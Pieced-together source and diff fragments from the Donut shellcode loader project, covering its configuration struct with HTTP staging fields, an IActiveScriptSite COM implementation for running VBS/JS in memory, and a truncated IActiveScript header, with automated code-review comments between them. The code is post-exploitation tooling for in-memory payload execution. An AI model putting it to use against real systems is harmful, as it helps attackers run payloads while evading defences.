143 char output[DONUT_MAX_NAME]; // name of output file to save loader
108144
109 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
110 uint64_t inst_len; // size of DONUT_INSTANCE
111 void *inst; // points to donut instance
145 // .NET stuff
146 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
147 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
148 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
149 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
112150
113 uint64_t pic_len; // size of shellcode
114 void *pic; // points to PIC/shellcode
151 // command line for DLL/EXE
152 char param[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
153 int unicode; // param is converted to UNICODE before being passed to DLL function
154
155 // HTTP staging information
156 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote http server
157 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
158
159 // DONUT_MODULE
160 int mod_type; // VBS/JS/DLL/EXE
161 int mod_len; // size of DONUT_MODULE
162 void *mod; // points to DONUT_MODULE
163
164 // DONUT_INSTANCE
165 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_HTTP
166 int inst_len; // size of DONUT_INSTANCE
167 void *inst; // points to DONUT_INSTANCE
168
169 // shellcode generated from configuration
170 int pic_len; // size of loader/shellcode
171 void* pic; // points to loader/shellcode
115172 } DONUT_CONFIG, *PDONUT_CONFIG;
173
174 // function pointers
175 typedef int (__cdecl *DonutCreate_t)(PDONUT_CONFIG);
176 typedef int (__cdecl *DonutDelete_t)(PDONUT_CONFIG);
177 typedef const char* (__cdecl *DonutError_t)(int);
116178
117179 #ifdef __cplusplus
118180 extern "C" {
119181 #endif
120182
183 // prototypes
121184 int DonutCreate(PDONUT_CONFIG);
185 int DonutCreateWrapper(const char *);
122186 int DonutDelete(PDONUT_CONFIG);
187 const char* DonutError(int);
123188
124189 #ifdef __cplusplus
125190 }
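Review bot: The `unicode` field's comment in this copy of DONUT_CONFIG (`// param is converted to UNICODE before being passed to DLL function`) contradicts the other copy added in this commit (`// param is passed to DLL function without converting to unicode`); the DONUT_MODULE comment (`// convert param to unicode for unmanaged DLL function`) supports the reading here, so the other copy looks wrong, but the two headers should be made to agree since both describe the same struct layout. In the same struct, `inst_type` is still documented as `DONUT_INSTANCE_PIC or DONUT_INSTANCE_HTTP` although this section renames that constant to `DONUT_INSTANCE_EMBED` and adds `DONUT_INSTANCE_DNS`; `// DONUT_INSTANCE_EMBED, DONUT_INSTANCE_HTTP or DONUT_INSTANCE_DNS` would match the defines. The new function-pointer typedefs use `__cdecl`, which the `LINUX` branch of the new platform block does not provide (GCC/Clang on Linux do not predefine it) unless it is defined elsewhere in this header — a `#ifndef __cdecl` / `#define __cdecl` / `#endif` next to `#define LINUX` would keep the typedefs compiling there. The added `DonutCreateWrapper(const char *)` prototype has no comment saying what the string argument is, unlike the `PDONUT_CONFIG` entry points next to it.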
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 #ifdef DEBUG
55 // try resolve interface name for IID
56 PWCHAR iid2interface(PWCHAR riid) {
57 LSTATUS s;
58 HKEY hk;
59 WCHAR subkey[128];
60 static WCHAR name[128];
61 DWORD len = ARRAYSIZE(name);
62
63 // check under HKEY_CLASSES_ROOT\Interface\ for name
64
65 swprintf(subkey, ARRAYSIZE(subkey), L"Interface\\%s", riid) ;
66
67 s = SHGetValueW(
68 HKEY_CLASSES_ROOT,
69 subkey,
70 NULL,
71 0,
72 name,
73 &len);
74
75 if(s != ERROR_SUCCESS) return L"Not found";
76
77 return name;
78 }
79 #endif
80
81 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
82 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
83
84 #ifdef DEBUG
85 OLECHAR *iid;
86 HRESULT hr;
87
88 hr = StringFromIID(riid, &iid);
89 if(hr == S_OK) {
90 DPRINT("IActiveScriptSite::QueryInterface(%ws (%ws))", iid, iid2interface(iid));
91 CoTaskMemFree(iid);
92 } else {
93 DPRINT("StringFromIID failed");
94 }
95 #endif
96
97 if(ppv == NULL) return E_POINTER;
98
99 // we implement the following interfaces
100 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
101 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
102 {
103 DPRINT("Returning interface to IActiveScriptSite");
104 *ppv = (LPVOID)this;
105 ActiveScript_AddRef(this);
106 return S_OK;
107 } else if(IsEqualIID(&mas->inst->xIID_IActiveScriptSiteWindow, riid)) {
108 DPRINT("Returning interface to IActiveScriptSiteWindow");
109 *ppv = (LPVOID)&mas->siteWnd;
110 ActiveScriptSiteWindow_AddRef(&mas->siteWnd);
111 return S_OK;
112 }
113 DPRINT("Returning E_NOINTERFACE");
114 *ppv = NULL;
115 return E_NOINTERFACE;
116 }
117
118 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
119 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
120
121 _InterlockedIncrement(&mas->site.m_cRef);
122
123 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
124
125 return mas->site.m_cRef;
126 }
127
128 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
129 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
130
131 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
132
133 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
134 return ulRefCount;
135 }
136
137 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
138 LPCOLESTR objectName, DWORD dwReturnMask,
139 IUnknown **objPtr, ITypeInfo **ppti)
140 {
141 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
142
143 DPRINT("IActiveScriptSite::GetItemInfo(objectName=%p, dwReturnMask=%08lx)",
144 objectName, dwReturnMask);
145
146 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
147 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
148 if(ppti == NULL) return E_POINTER;
149
150 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
151 *ppti = mas->wscript.lpTypeInfo;
152 }
153
154 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
155 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
156 if(objPtr == NULL) return E_POINTER;
157
158 mas->wscript.lpVtbl->AddRef(&mas->wscript);
159 *objPtr = (IUnknown*)&mas->wscript;
160 }
161
162 return S_OK;
163 }
164
165 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
166 IActiveScriptError *scriptError)
167 {
168 DPRINT("IActiveScriptSite::OnScriptError");
169
170 EXCEPINFO ei;
171 DWORD dwSourceContext = 0;
172 ULONG ulLineNumber = 0;
173 LONG ichCharPosition = 0;
174 HRESULT hr;
175
176 Memset(&ei, 0, sizeof(EXCEPINFO));
177
178 DPRINT("IActiveScriptError::GetExceptionInfo");
179 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
180 if(hr == S_OK) {
181 DPRINT("IActiveScriptError::GetSourcePosition");
182 hr = scriptError->lpVtbl->GetSourcePosition(
183 scriptError, &dwSourceContext,
184 &ulLineNumber, &ichCharPosition);
185 if(hr == S_OK) {
186 DPRINT("JSError: %ws line[%d:%d]\n",
187 ei.bstrDescription, ulLineNumber, ichCharPosition);
188 }
189 }
190 return S_OK;
191 }
192
193 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
194 DPRINT("IActiveScriptSite::GetLCID");
195 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
196
197 *plcid = mas->inst->api.GetUserDefaultLCID();
198 return S_OK;
199 }
200
201 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
202 DPRINT("IActiveScriptSite::GetDocVersionString");
203
204 return S_OK;
205 }
206
207 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
208 const VARIANT *pvr, const EXCEPINFO *pei)
209 {
210 DPRINT("IActiveScriptSite::OnScriptTerminate");
211
212 return S_OK;
213 }
214
215 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
216 DPRINT("IActiveScriptSite::OnStateChange");
217
218 return S_OK;
219 }
220
221 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
222 DPRINT("IActiveScriptSite::OnEnterScript");
223
224 return S_OK;
225 }
226
227 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
228 DPRINT("IActiveScriptSite::OnLeaveScript");
229
230 return S_OK;
231 }
232
233
234 // ################################################# IActiveScriptSiteWindow ###############################################
235
236 // initialize virtual function table for this interface
237 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this) {
238 // Initialize IUnknown
239 this->lpVtbl->QueryInterface = ADR(LPVOID, ActiveScriptSiteWindow_QueryInterface);
240 this->lpVtbl->AddRef = ADR(LPVOID, ActiveScriptSiteWindow_AddRef);
241 this->lpVtbl->Release = ADR(LPVOID, ActiveScriptSiteWindow_Release);
242
243 // Initialize IActiveScriptSiteWindow
244 this->lpVtbl->GetWindow = ADR(LPVOID, ActiveScriptSiteWindow_GetWindow);
245 this->lpVtbl->EnableModeless = ADR(LPVOID, ActiveScriptSiteWindow_EnableModeless);
246
247 this->m_cRef = 0;
248 this->inst = inst;
249 }
250
251 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv) {
252 OLECHAR *iid;
253 HRESULT hr;
254
255 DPRINT("ActiveScriptSiteWindow::QueryInterface");
256
257 if(ppv == NULL) return E_POINTER;
258
259 // we implement the following interfaces
260 if(IsEqualIID(&this->inst->xIID_IUnknown, riid) ||
261 IsEqualIID(&this->inst->xIID_IActiveScriptSiteWindow, riid))
262 {
263 DPRINT("Returning this interface");
264 *ppv = (LPVOID)this;
265 ActiveScriptSiteWindow_AddRef(this);
266 return S_OK;
267 }
268 DPRINT("Interface not supported");
269 *ppv = NULL;
270 return E_NOINTERFACE;
271 }
272
273 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this) {
274 _InterlockedIncrement(&this->m_cRef);
275
276 DPRINT("ActiveScriptSiteWindow::AddRef(%i)", this->m_cRef);
277
278 return this->m_cRef;
279 }
280
281 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this) {
282 ULONG ulRefCount = _InterlockedDecrement(&this->m_cRef);
283
284 DPRINT("ActiveScriptSiteWindow::Release(%i)", ulRefCount);
285
286 return ulRefCount;
287 }
288
289 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd) {
290 DPRINT("ActiveScriptSiteWindow::GetWindow(phwnd=%p)", phwnd);
291 return E_NOTIMPL;
292 }
293
294 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable) {
295 DPRINT("ActiveScriptSiteWindow::EnableModeless(fEnable=%ws)", fEnable ? L"FALSE" : L"TRUE");
296 return E_NOTIMPL;
297 }
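Review bot: ActiveScript_GetDocVersionString returns S_OK without writing its out-parameter, so an engine that honours the interface contract reads an indeterminate `BSTR` from `*version` (and may attempt to free it); either write `*version = NULL;` before returning or return `E_NOTIMPL` as ActiveScriptSiteWindow_GetWindow and EnableModeless already do for unsupported methods. In ActiveScript_OnScriptError the `EXCEPINFO` populated by GetExceptionInfo is never released: `ei.bstrSource`, `ei.bstrDescription` and `ei.bstrHelpFile` should be freed with SysFreeString (through the instance API table, if that is how the loader resolves OLE calls) — the `DPRINT` is the only consumer and compiles out of non-DEBUG builds, so the strings leak on every script error. Two smaller points: ActiveScript_AddRef and ActiveScriptSiteWindow_AddRef discard the `_InterlockedIncrement` result and return a separate non-atomic read of `m_cRef`, so `return _InterlockedIncrement(&mas->site.m_cRef);` is the safer form, and the `fEnable ? L"FALSE" : L"TRUE"` in EnableModeless prints the inverse of the flag. ActiveScriptSiteWindow_QueryInterface also declares `iid` and `hr` but never uses them.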
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 ULONG m_cRef;
302 PDONUT_INSTANCE inst;
303 } ActiveScriptSiteWindow;
304
305 typedef struct _IActiveScriptErrorVtbl {
306 BEGIN_INTERFACE
307
308 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
309 IActiveScriptError * This,
310 /* [in] */ REFIID riid,
311 /* [annotation][iid_is][out] */
312 void **ppvObject);
313
314 ULONG ( STDMETHODCALLTYPE *AddRef )(
315 IActiveScriptError * This);
316
317 ULONG ( STDMETHODCALLTYPE *Release )(
318 IActiveScriptError * This);
319
320 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
321 IActiveScriptError * This,
322 /* [out] */ EXCEPINFO *pexcepinfo);
323
324 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
325 IActiveScriptError * This,
326 /* [out] */ DWORD *pdwSourceContext,
327 /* [out] */ ULONG *pulLineNumber,
328 /* [out] */ LONG *plCharacterPosition);
329
330 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
331 IActiveScriptError * This,
332 /* [out] */ BSTR *pbstrSourceLine);
333
334 END_INTERFACE
335 } IActiveScriptErrorVtbl;
336
337 typedef struct _IActiveScriptError {
338 IActiveScriptErrorVtbl *lpVtbl;
339 } ActiveScriptError;
340
341 typedef struct _IActiveScriptSiteVtbl {
342 BEGIN_INTERFACE
343
344 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
345 IActiveScriptSite * This,
346 /* [in] */ REFIID riid,
347 /* [annotation][iid_is][out] */
348 void **ppvObject);
349
350 ULONG ( STDMETHODCALLTYPE *AddRef )(
351 IActiveScriptSite * This);
352
353 ULONG ( STDMETHODCALLTYPE *Release )(
354 IActiveScriptSite * This);
355
356 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
357 IActiveScriptSite * This,
358 /* [out] */ LCID *plcid);
359
360 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
361 IActiveScriptSite * This,
362 /* [in] */ LPCOLESTR pstrName,
363 /* [in] */ DWORD dwReturnMask,
364 /* [out] */ IUnknown **ppiunkItem,
365 /* [out] */ ITypeInfo **ppti);
366
367 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
368 IActiveScriptSite * This,
369 /* [out] */ BSTR *pbstrVersion);
370
371 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
372 IActiveScriptSite * This,
